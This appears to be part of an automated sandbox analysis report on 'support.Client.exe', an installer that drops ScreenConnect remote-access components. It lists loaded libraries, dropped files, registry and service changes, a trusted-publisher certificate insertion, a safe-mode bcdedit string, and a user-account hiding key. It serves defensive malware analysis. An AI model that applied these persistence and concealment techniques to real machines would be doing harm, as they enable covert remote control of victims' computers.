                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: virtdisk.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_1_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: virtdisk.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
                Source: C:\Users\user\Desktop\support.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: support.Client.exeStatic PE information: certificate valid
                Source: support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: support.Client.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: support.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: support.Client.exe
                Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E3D41000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E40F9000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000010.00000002.3148495493.0000000001832000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe, 00000012.00000002.4166697871.0000000002761000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.4164882713.0000000002C60000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.4165858393.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000010.00000000.3144357412.0000000000BAD000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E40FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E3D45000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3152789867.000000001B8E2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 0000000F.00000000.3138042328.0000000000502000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000F.00000000.3138042328.0000000000502000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E3D35000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3150615596.0000000000DF2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E3D35000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3150615596.0000000000DF2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E40F3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E3D3D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000010.00000002.3149043618.00000000056C2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                Source: support.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: support.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: support.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: support.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: support.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: ScreenConnect.WindowsFileManager.exe.2.drStatic PE information: 0xC9D5F63E [Wed Apr 21 14:57:02 2077 UTC]
                Source: support.Client.exeStatic PE information: real checksum: 0x14df5 should be: 0x22c24
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Windows.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.ClientService.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsFileManager.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Client.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.ClientService.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Core.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsClient.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dllJump to dropped file
                Source: ScreenConnect.ClientService.dll.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                Source: ScreenConnect.ClientService.dll0.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                Source: Amcache.hve.5.drBinary or memory string: bcdedit.exe|ac227fd116781fea
                Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\bcdedit.exe
                Source: Amcache.hve.5.drBinary or memory string: bcdedit.exe
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (577cfc54-82b0-4777-83f3-37207b6e5fc8)

                Hooking and other Techniques for Hiding and Protection

                barindex
                Contains functionality to hide user accounts
                Source: ScreenConnect.WindowsClient.exe, 0000000F.00000002.3152789867.000000001B8E2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: ScreenConnect.ClientService.exe, 00000010.00000002.3148495493.0000000001832000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                Source: ScreenConnect.WindowsClient.exe, 00000012.00000002.4166697871.0000000002761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.4164882713.0000000002C60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                Source: ScreenConnect.WindowsClient.exe, 00000013.00000002.4165858393.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                Source: ScreenConnect.ClientService.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                Source: ScreenConnect.ClientService.dll0.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                Source: ScreenConnect.Windows.dll0.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: ScreenConnect.Windows.dll.2.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: C:\Users\user\Desktop\support.Client.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
